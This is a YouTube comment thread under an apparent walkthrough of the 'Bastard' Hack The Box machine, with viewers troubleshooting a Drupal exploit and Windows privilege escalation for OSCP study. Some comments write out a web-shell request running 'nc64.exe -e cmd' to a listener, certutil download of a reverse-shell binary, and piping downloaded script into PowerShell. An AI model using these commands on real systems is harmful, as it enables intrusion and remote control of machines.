My God Ipp one again you outdone yourself. Once again the greatest info sec vid i ever seen. Thanks a thousand time. so explanatory and clear. IM so gratefull. . Keep it up its so appreciated that u share and teach !
I'm studying for my OSCP exam and your work is helping a lot. Thank you. I really mean it. Took me 5 hours to reproduce the steps you went through in this video and I must admit this machine killed me. I definitely have to try harder. Keep up the good work. Now for my italian fellows: Se qualcuno ha voglia di fare un gruppetto di studio per scambiarsi esperienze, opinioni e consigli si faccia pure sentire! Ciao!!
if anyone is having issues with the PHP exploit while using PHP version 7.3.8 update it too 7.4 and reinstall php-curl and it should run without the curl_init error.
I used the PHP exploit with the OS shell, downloaded a msfvenom reverse TCP shell.exe with certutil, and then executed a reverse shell - but I'm sure you wanted to show other techniques with Burp and web shells - which I found very useful to learn about! Great video! Thanks!
Hey man, so what modifications did you do to the php exploit? Did you only modify the rest_endpoint? And how did you know that it should be changed back to ‘rest’?
@@younesmohssen8158 I didn't make any modifications. I just ran the Drupal exploit, uploaded a reverse shell binary (.exe), and then executed it (shell.exe) and generated a reverse shell
Thank you IppSec for such an in depth video! i am stuck only on one part in the video...i had no issues with any of other sripts upload or techniques, but for some reason not able to upload nc64.exe to the target: i've tired the following: 1. Kali:/path/where/nc64exe/is/directory: #python -m SimpleHTTPServer 8000 2. kali:/second/terminal/window:#nc -lvnp 8081 3. Kali:10.10.10.9/cybersec.php?fupload=nc64.exe&fexec=nc64.exe -e cmd 10.10.x.x 8081 am I missing anything?
Hi, I know this is a bit of an old comment, but did you solve this issue? I'm stuck on the exact same place and even trying to do similar things from other guides it always fails at this stage where I try to upload a file, it's like something is blocking upload attempts.
@@ippsec I was asking about how you could upload nc64.exe from your machine to the victim buy just entering the file name in the url but reviewing the code at 15:39 shows that you actually coded the shell to download files from PythonHttpServer on your machine, that's why you can just enter nc64.exe and it will be uploaded .😅 Thanks bro keep the great work
There's actually a simpler way to privesc on this box, if you do whoami /all you will see you have SeImpersonatePrivilege enabled which would allow you to execute Juicy potato, takes like 5 minutes.
This one is kinda difficult in my case. If I don't have your tutorial, that exploit is not working for me. I wonder what level of difficulty is this machine? If it is just average box, I think I am far away from a pen tester now.
i get this error when executing the code, everything is right... PHP Fatal error: Uncaught Error: Call to undefined function curl_init() in /drupal.php:265 Stack trace: #0 /drupal.php(115): Browser->post('application/vnd...', 'a:2:{s:8:"usern...') #1 {main} thrown in /drupal.php on line 265
He want to execute this module/function so when he added this at the end of the script, the script execute automatically this function. idk if it is clear but look how powersploit/powerup work normally in powershell and you will understand. hope it make sense lol
The first command downloads the contents of the file as a string. So by using a pipe you are sending that string as input to powershell for it to interpret, the "-" represents that. So to write it another way would be "powershell -noprofile 'downloadedString'". The noprofile flag says don't load any pre-defined user commands, (similar to excluding ~/.bashrc on linux)
I get a random error on line 24 but I didn't even touch that code php 41564.php PHP Parse error: syntax error, unexpected 'error_reporting' (T_STRING) in /root/Documents/htb/boxes/Bastard/41564.php on line 24 and line 24 is error_reporting(E_ALL);
excellent video :) well explained, I got struck in this machine and after vacation seems like it has been retired.... :) I was able to find till end point and could not get the admin user created thru ambionics script..... Could you shed light on why you used 127.0.0.1 instead of the ipaddress of Bas____ please....
Well you could have used powershell for file upload (no need for php uploader). Great video though, explaining other angles :) Also filed issue here github.com/rasta-mouse/Sherlock/issues/5
I am not able to privesc in this machine ...EXE s are not running ...tried nc64.exe ..not worring ...used nishang to get a powershell reverse shell ... in that also no exe is running ...i tried both 64 and 32 version of it ... PS C:\inetpub\drupal-7.54> Invoke-PowerShellTcp : Program 'ssec.exe' failed to execute: This version of %1 is not compatible with the version of Windows you're running. Check your compu ter's system information to see whether you need a x86 (32-bit) or x64 (64-bit) version of the program, and then contact the software publisher Any help is appreciated thanks
My God Ipp one again you outdone yourself. Once again the greatest info sec vid i ever seen. Thanks a thousand time. so explanatory and clear. IM so gratefull. . Keep it up its so appreciated that u share and teach !
What a master. It's a pleasure to see you speak through your process.Thanks for putting these vids up.
incerdible how much your production has increased over the years. Awesome that you've been making content this long.
I'm studying for my OSCP exam and your work is helping a lot. Thank you. I really mean it. Took me 5 hours to reproduce the steps you went through in this video and I must admit this machine killed me. I definitely have to try harder. Keep up the good work.
Now for my italian fellows: Se qualcuno ha voglia di fare un gruppetto di studio per scambiarsi esperienze, opinioni e consigli si faccia pure sentire! Ciao!!
io ho voglia di fare un gruppo! :D
A bit too late ma eccomi qui
Hi Marco, have you had issues uploading nc64.exe? i've run into the problem only with this part of the video.
Did you pass your exam?
Your a modern wonder man, I'm so happy you make these videos, your insight into operating systems is truly amazing keep up the good work xx
=^.^=
Thanks for this video - I learned quite a bit!
Excellent job you are doing bro! Thanks for sharing!
for anyone that get the wierd error from the php script
'apt install curl-php'
Had to do the install on my end 'apt-get install php-curl'
This was of very good help. Thank You.
Thank you. This helped a lot
on newer versions of Kali with php v 7.2 its sudo apt-get install php7.2-curl
Very useful, thank you man!
if anyone is having issues with the PHP exploit while using PHP version 7.3.8 update it too 7.4 and reinstall php-curl and it should run without the curl_init error.
"ch ch ch ch ch chhhhhhhh.." last few month live with that sound :)
I used the PHP exploit with the OS shell, downloaded a msfvenom reverse TCP shell.exe with certutil, and then executed a reverse shell - but I'm sure you wanted to show other techniques with Burp and web shells - which I found very useful to learn about!
Great video! Thanks!
Hey man, so what modifications did you do to the php exploit? Did you only modify the rest_endpoint? And how did you know that it should be changed back to ‘rest’?
@@younesmohssen8158 I didn't make any modifications. I just ran the Drupal exploit, uploaded a reverse shell binary (.exe), and then executed it (shell.exe) and generated a reverse shell
TheCryptonian ohhhh okay and how about the endpoint? How did you know it was ‘rest’ and not ‘rest_endpoint’?
@@younesmohssen8158 Did you find an answer bro, how to know it is rest, or something else when it comes up next time
searchsploit -m 4449 --> shell
Thank you very mutch sir.
As always, A-MAY-ZING! Thanks!
Thank you IppSec for such an in depth video!
i am stuck only on one part in the video...i had no issues with any of other sripts upload or techniques, but for some reason not able to upload nc64.exe to the target:
i've tired the following:
1. Kali:/path/where/nc64exe/is/directory: #python -m SimpleHTTPServer 8000
2. kali:/second/terminal/window:#nc -lvnp 8081
3. Kali:10.10.10.9/cybersec.php?fupload=nc64.exe&fexec=nc64.exe -e cmd 10.10.x.x 8081
am I missing anything?
You've missed to enclose the arguments to nc64 in quotes, as ipp explains this is so that nc64 takes those in as one argument
Hi, I know this is a bit of an old comment, but did you solve this issue? I'm stuck on the exact same place and even trying to do similar things from other guides it always fails at this stage where I try to upload a file, it's like something is blocking upload attempts.
@@bigbmxdave Sorry Oguzhan, i cna't remember exactly:) have to go back in time, or redo this box again to validate. will let you know
29:55 How can you enter the path of the nc64.exe like that and still works ? How does the php file knows the location of the executable on your disk
Current working directory is in the path by default.
@@ippsec I was asking about how you could upload nc64.exe from your machine to the victim buy just entering the file name in the url but reviewing the code at 15:39 shows that you actually coded the shell to download files from PythonHttpServer on your machine, that's why you can just enter nc64.exe and it will be uploaded .😅 Thanks bro keep the great work
There's actually a simpler way to privesc on this box, if you do whoami /all you will see you have SeImpersonatePrivilege enabled which would allow you to execute Juicy potato, takes like 5 minutes.
This machine came out before that was a thing 😀
@@ippsec I did think that might be the case, great videos by the way! :)
i kept getting access denied whenever I tried running juicyp
ahahha this is exactly what I did, along with drupalgeddon which I also believe is newer, done the box in ~ 30 mins
Great Walkthrough!
This one is kinda difficult in my case. If I don't have your tutorial, that exploit is not working for me.
I wonder what level of difficulty is this machine? If it is just average box, I think I am far away from a pen tester now.
I have the same feeling. Since this comment was posted 5 years ago, how're you doing right now?
thanks man !! that was pain for me to crack it alone !
just freaking awesome
any idea why i am seeing "no socket" when i goto 10.10.10.9. No image, nothing, just no socket written. :/
@IppSec I am just wondering did you fix the exploit before you started recording? When I ran the exploit I had to fix the "curl_init()" function.
For everyone interested ... do an 'apt-get install php-curl' to install the required library.
@@Sokow thank you!!
@@Sokow holy wow thank you so much
i only managed user. Thanks for this
The great course
i want to know which keyboard are you using?!
Awesome video. Thx a lot - KNX
i get this error when executing the code, everything is right...
PHP Fatal error: Uncaught Error: Call to undefined function curl_init() in /drupal.php:265
Stack trace:
#0 /drupal.php(115): Browser->post('application/vnd...', 'a:2:{s:8:"usern...')
#1 {main}
thrown in /drupal.php on line 265
I literally solved it 2 minutes after typing this comment, a quick google taught me to download this
sudo apt-get install php-curl
worked right after!
hello dear, i will like to know why in PowerUp.ps1 file you add Invoke-AllChecks in the end of the file
He want to execute this module/function so when he added this at the end of the script, the script execute automatically this function. idk if it is clear but look how powersploit/powerup work normally in powershell and you will understand. hope it make sense lol
Hi, just a question, why we need to type: “ | powershell -noprofile - “ ?
The first command downloads the contents of the file as a string. So by using a pipe you are sending that string as input to powershell for it to interpret, the "-" represents that. So to write it another way would be "powershell -noprofile 'downloadedString'". The noprofile flag says don't load any pre-defined user commands, (similar to excluding ~/.bashrc on linux)
I get a random error on line 24 but I didn't even touch that code
php 41564.php
PHP Parse error: syntax error, unexpected 'error_reporting' (T_STRING) in /root/Documents/htb/boxes/Bastard/41564.php on line 24
and line 24 is
error_reporting(E_ALL);
check the comments above in the code before error_reporting and remove the word which is without #
Awesome thank you,
any particular reason you dont use your shell for uploading PowerUp?
And thank you for your channel, you are AWESOME man, i hope i can have the half of your skill and i will be happy :D
Just mixing up techniques between videos. Try to rotate TTP's between boxes to show different ways to do things.
Ok thanks and please continue videos i learn a lot of tricks with you!!! You are in my PC with notes ippsec_TIPS_&_TRICKS ahaha
Get 500 - Internal server error when checking to see once the ippsec.php file is written via the drupal.php script.
I love you.
excellent video :) well explained, I got struck in this machine and after vacation seems like it has been retired.... :) I was able to find till end point and could not get the admin user created thru ambionics script..... Could you shed light on why you used 127.0.0.1 instead of the ipaddress of Bas____ please....
Watch the arctic video, I explain it there aswell. Essentially just a easy hack to get the request into burp without code changes
Well you could have used powershell for file upload (no need for php uploader). Great video though, explaining other angles :) Also filed issue here github.com/rasta-mouse/Sherlock/issues/5
Yeah, there's a lot I want to do with Powershell but this is only Version 2. So probably wait for a future box to do more powershell stuff.
Hi! Was MS15-051 actually verified on this box, or was it just speculation that Sherlock is giving a false result?
It's verified in this video :) I used MS15-051, download it at 32m
Heh - wasn't paying close attention. Will pick this up on Twitter :)
would you make another videos for windows machines ?
I am not able to privesc in this machine ...EXE s are not running ...tried nc64.exe ..not worring ...used nishang to get a powershell reverse shell ... in that also no exe is running ...i tried both 64 and 32 version of it ...
PS C:\inetpub\drupal-7.54> Invoke-PowerShellTcp : Program 'ssec.exe' failed to execute: This version of %1 is not compatible with the version of Windows you're running. Check your compu ter's system information to see whether you need a x86 (32-bit) or x64 (64-bit) version of the program, and then contact the software publisher
Any help is appreciated
thanks
What did you do?
why are all these windows servers with greek locale ? Greeks making these kind of boxes ?
Hey what's up @ipsec
@ippsec